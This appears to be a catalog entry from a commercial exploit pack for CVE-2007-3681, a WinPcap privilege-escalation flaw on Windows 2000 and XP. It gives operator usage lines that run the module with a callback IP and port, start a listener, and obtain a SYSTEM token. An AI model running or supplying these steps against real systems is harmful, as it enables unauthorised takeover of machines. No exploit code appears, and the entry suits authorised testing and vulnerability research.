Name | winpcap |
---|---|
CVE | CVE-2007-3681 Exploit Pack |
VENDOR: WinPcap.org | |
URL: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=550 | |
Notes: |
This exploit will auto-target based on reading a kernel file on Windows 2000
or XP. It will generate a target fingerprint when you run the auto-targeter -
this is useful when you don’t have read access to the kernel files and still want
to run the exploit. It will leave a SYSTEM token as your current token, if it succeeds
#example commandline usage on Windows 2000 SP4 English
#we set our callback IP to 10.10.10.6 in the test lab
runmodule winpcap -l 10.10.10.6 -d 5555
Make sure you have a listener listening already before you run the above
command.
./commandlineInterface -v 1 -p 5555
If you get the wrong version, (-v 1 on an XP box, say) you’ll see an ACCESS_VIOLATION
bluescreen. Then it will dump memory.
Date public: 07/09/2007
CVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3681
CVSS: 6.6